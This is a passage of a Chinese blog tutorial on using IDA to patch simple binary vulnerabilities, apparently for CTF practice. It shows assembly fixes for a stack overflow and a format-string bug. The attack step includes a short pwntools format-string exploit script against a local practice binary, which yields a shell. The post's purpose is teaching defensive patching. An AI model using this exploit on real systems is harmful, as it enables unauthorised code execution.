                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a6.png?x-oss-process=style/watermark"
                     
                ></p>
<p>在程序执行时，我们使其跳转到这里，执行完毕后，再跳转回去，就不会影响原来的指令了。</p>
<h3 id="3-2-2-修补"><a href="#3-2-2-修补" class="headerlink" title="3.2.2 修补"></a>3.2.2 修补</h3><p>原先<code>Scanf</code>的汇编指令：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a1.png?x-oss-process=style/watermark"
                     
                ></p>
<p>1、在<code>call</code>指令之前都是在调用参数，可以看到<code>rdi</code>寄存器里放了参数<code>%s</code>，因此我们需要将其修改为0：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a3.png?x-oss-process=style/watermark"
                     
                ></p>
<p>2、后面的空间不够我们使用，因此我们使用在数据段编写指令、并跳转数据段的方法，将当前地址命名（按<code>n</code>命名）如下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a4.png?x-oss-process=style/watermark"
                     
                ></p>
<p>在数据段命名：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a5.png?x-oss-process=style/watermark"
                     
                ></p>
<p>3、 在数据段编写汇编指令如下：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov edx,20 //read的第3个参数</span><br><span class="line">xor rax,rax //令rax为0，read的系统调用号为0</span><br><span class="line">syscall  //系统调用</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a7.png?x-oss-process=style/watermark"
                     
                ></p>
<p>然后加入ret指令，使它跳转到这里后再跳转回原理流程：<code>jmp jmp_ret</code></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a8.png?x-oss-process=style/watermark"
                     
                ></p>
<p>4、回到原来的流程段，修改原先命令使它可以跳转到这里，将多余指令<code>nop</code>掉，将<code>call</code>指令改为<code>jmp jmp_to</code>：、</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a9.png?x-oss-process=style/watermark"
                     
                ></p>
<p>改完如下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a10.png?x-oss-process=style/watermark"
                     
                ></p>
<p>5、修改完毕后，原先的<code>scanf</code>会变成<code>sys_read</code>：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a11.png?x-oss-process=style/watermark"
                     
                ></p>
<p>保存之后，使用攻击脚本，出现错误：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix16.png?x-oss-process=style/watermark"
                     
                ></p>
<hr>
<h1 id="四、格式化字符串漏洞修补"><a href="#四、格式化字符串漏洞修补" class="headerlink" title="四、格式化字符串漏洞修补"></a>四、格式化字符串漏洞修补</h1><p>格式化字符串漏洞由于缺少了参数，造成字符漏洞，因此我们需要补上参数。</p>
<p>文件链接：<a class="link"   target="_blank" rel="noopener" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/test/fix/" >https://wutongblogs.oss-cn-beijing.aliyuncs.com/test/fix/ <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h2 id="4-1-攻击"><a href="#4-1-攻击" class="headerlink" title="4.1 攻击"></a>4.1 攻击</h2><p>反汇编：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f3.png?x-oss-process=style/watermark"
                     
                ></p>
<p>存在格式化字符串漏洞。</p>
<p>攻击脚本：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">&#x27;./esft_x86_1&#x27;</span>)</span><br><span class="line">payload = fmtstr_payload(<span class="number">10</span>,&#123;<span class="number">0x804C044</span>:<span class="number">0x1</span>&#125;)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;name:&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;passwd:&#x27;</span>)</span><br><span class="line">p.sendline(<span class="string">&quot;1&quot;</span>)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<p>成功获取shell：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f1.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="4-2-修补"><a href="#4-2-修补" class="headerlink" title="4.2 修补"></a>4.2 修补</h2><p>1、Printf没有参数%s造成溢出，因此首先在数据段写入%s字符</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f4.png?x-oss-process=style/watermark"
                     
                ></p>
<p>2、原先的流程内，不够布置两个参数，因此同样需要跳转流程：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f5.png?x-oss-process=style/watermark"
                     
                ></p>
<p>修改汇编指令如下：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">lea eax, [as] //将%s放入eax寄存器</span><br><span class="line">push eax  //%s入栈</span><br><span class="line">call printf //调用Printf</span><br><span class="line">pop eax //把多push的东西pop出来</span><br><span class="line">jmp jmp_ret //回到原来流程</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f6.png?x-oss-process=style/watermark"
                     
                ></p>
<p>3、完成修改：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f7.png?x-oss-process=style/watermark"
                     
                ></p>
<p>刷新一下，成功修改：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f8.png?x-oss-process=style/watermark"
                     
                ></p>
<p>保存之后，使用攻击脚本，出现错误：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f2.png?x-oss-process=style/watermark"
                     
                ></p>
<h1 id="IDA使用快捷键："><a href="#IDA使用快捷键：" class="headerlink" title="IDA使用快捷键："></a>IDA使用快捷键：</h1><ul>
<li><code>n</code>：更改变量的名称</li>
<li><code>g</code>：直接跳转到某个地址</li>
<li><code>ctrl+s</code>：选择某个数据段，直接进行跳转</li>
<li><code>/</code>：在反编译后伪代码的界面中写下注释</li>
<li><code>；</code>：在反汇编后的界面中写下注释</li>
<li><code>\</code>：在反编译后伪代码的界面中隐藏&#x2F;显示变量和函数的类型描述，有时候变量特别多的时候隐藏掉类型描述看起来会轻松很多</li>
<li><code>c</code>: 将数据段转化成代码</li>
<li><code>x</code>：对着某个函数、变量按该快捷键，可以查看它的交叉引用¹²</li>
<li><code>y</code>：更改变量的类型</li>
<li><code>a</code>：将数据转换为字符串</li>
<li><code>H</code>：在数字上按下H键或者右键进行选择，可以将数字转化为十进制</li>
<li><code>B</code>：按下 B键 转换为二进制也是同理</li>
<li><code>u</code>：取消定义函数、代码、数据的定义</li>
</ul>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> IDA修补简单漏洞</li>
        <li><strong>Author:</strong> wutong</li>
        <li><strong>Created at:</strong> 2023-07-25 19:45:14</li>
        
            <li>
                <strong>Updated at:</strong> 2023-08-20 19:40:44
            </li>
        
        <li>
            <strong>Link:</strong> https://wutong01304.github.io/2023/07/25/fix/
        </li>
        <li>
            <strong>License:</strong> This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>.
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/Pwn/">#Pwn</a>&nbsp;
                        </li>
                    
                </ul>
            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2023/07/27/heap1/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">堆基础原理</span>
                                    <span class="post-nav-item">Prev posts</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/07/23/fmtstr/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">格式化字符串漏洞+整数溢出</span>
                                    <span class="post-nav-item">Next posts</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">IDA修补简单漏洞</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E6%A0%88%E6%BA%A2%E5%87%BA%E4%BF%AE%E8%A1%A5"><span class="nav-text">一、栈溢出修补</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#1-1-%E5%B7%A5%E5%85%B7%E5%87%86%E5%A4%87"><span class="nav-text">1.1 工具准备</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-2-%E5%AD%97%E8%8A%82%E6%9C%AA%E9%99%90%E5%88%B6%E5%AF%BC%E8%87%B4%E7%9A%84%E7%AE%80%E5%8D%95%E6%BC%8F%E6%B4%9E"><span class="nav-text">1.2 字节未限制导致的简单漏洞</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E4%BF%AE%E8%A1%A5"><span class="nav-text">二、整数溢出修补</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#2-1-%E6%94%BB%E5%87%BB"><span class="nav-text">2.1 攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-2-%E4%BF%AE%E8%A1%A5"><span class="nav-text">2.2 修补</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E6%A0%88%E6%BA%A2%E5%87%BA%E4%BF%AE%E8%A1%A5"><span class="nav-text">三、栈溢出修补</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#3-1-%E6%94%BB%E5%87%BB"><span class="nav-text">3.1 攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-2-%E9%98%B2%E5%BE%A1"><span class="nav-text">3.2 防御</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E4%BF%AE%E8%A1%A5"><span class="nav-text">四、格式化字符串漏洞修补</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#4-1-%E6%94%BB%E5%87%BB"><span class="nav-text">4.1 攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-2-%E4%BF%AE%E8%A1%A5"><span class="nav-text">4.2 修补</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#IDA%E4%BD%BF%E7%94%A8%E5%BF%AB%E6%8D%B7%E9%94%AE%EF%BC%9A"><span class="nav-text">IDA使用快捷键：</span></a></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>
            
            

        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2023</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">wutong</a>
        </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a></span>
                <br>
            <span class="theme-version-container">THEME&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.2.1</a>
        </div>
        
        
        
        
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>





    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>






  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax',
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
